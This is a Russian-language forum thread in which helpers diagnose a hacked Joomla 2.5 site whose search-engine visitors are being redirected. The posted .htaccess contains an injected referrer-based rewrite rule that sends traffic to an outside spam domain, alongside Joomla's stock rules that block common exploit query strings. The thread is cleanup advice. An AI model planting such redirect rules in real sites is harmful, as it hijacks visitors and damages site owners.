Сайт взломали, и перенаправляет теперь на http://error404.000webhost.com/? - Безопасность сайтов на Joomla

Помогите пожалуйста!
Такая проблема: сайт на думла 2.5, домен http://icml.org.ua/.
Если ввести домен  http://icml.org.ua/ в адресную строку браузера,  все нормально - сайт открывается.
Но если сайт находит Google, или Яндекс или др.( например по запросу "ирпенская больница"), перенаправляет на какуюто хрень под названием http://error404.000webhost.com/?
Помогите пожалуйста разобраться, как сделать чтобы правильно открывался сайт поисковиками.
Делал запрос на хостинг, сказали мы не при делах, все работает

посмотрите файл .htaccess скорее всего там перенаправление

Вот так выглядит .htaccess
Подскаите пожалуйста, что тут не так

<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
   RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
   RewriteRule ^.*$ http://renidisc.com/oeci.html?h=1224318 [L,R]
</IfModule>

##
# @version $Id: htaccess.txt 10492 2008-07-02 06:38:28Z ircmaxell $
# @package Joomla
# @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##


#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

Вот Ваш редирект, удалите этот код.

Это кажется лишнее. Но еще не решение проблемы.

Ищи вставки base64_decode в файлах .php и
проверку на UserAgent в яваскриптах

Спасибо всем, а особенно Apple_Buy и wishlight - все работает

А что сделать чтобы это не повторилось?

А что сделать чтобы это не повторилось?

Проверить сайт на наличие шеллов и других вредоносных скриптов, обновить движок до последней возможной версии, обновить все расширения на сайте до последних версий, сменить все админские пароли доступа.

А если просто поставить какие-нибудь права доступа ? Поможет ?

А если просто поставить какие-нибудь права доступа ? Поможет ?

Это не решение проблемы, если есть вредоносный скрипт (а он скорее всего есть) то игра с правами доступа не поможет. Можете конечно ради эксперимента поставить права 444 на файл .htaccess и посмотрите будет ли меняться его содержимое. У вас есть уязвимость какая то в результате чего посторонние люди получили доступ с файлам. В любом случае лучше проверить весь сайт и устранить заразу.